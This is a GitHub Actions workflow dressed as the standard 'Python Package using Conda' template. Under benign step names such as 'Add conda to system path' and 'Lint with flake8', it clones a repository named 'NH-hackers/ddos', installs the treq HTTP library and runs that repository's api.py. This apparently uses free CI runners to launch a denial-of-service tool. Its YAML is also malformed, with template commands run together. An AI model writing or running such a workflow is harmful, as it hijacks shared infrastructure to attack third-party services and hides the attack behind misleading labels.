name: Python Package using Conda

on: [push]

jobs:
  build-linux:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 5

    steps:
    - uses: actions/checkout@v3
    - name: Add conda to system path
      run: git clone https://github.com/NH-hackers/ddos.git; cd ddos
        # $CONDA is an environment variable pointing to the root of the miniconda directory
        echo $CONDA/bin >> $GITHUB_PATH
    - name: Install dependencies
      run: pip install treq
        conda env update --file environment.yml --name base
    - name: Lint with flake8
      run: python3 api.py
        conda install flake8
        
    - name: Test with pytest
      run: |
        conda install pytest
        pytest
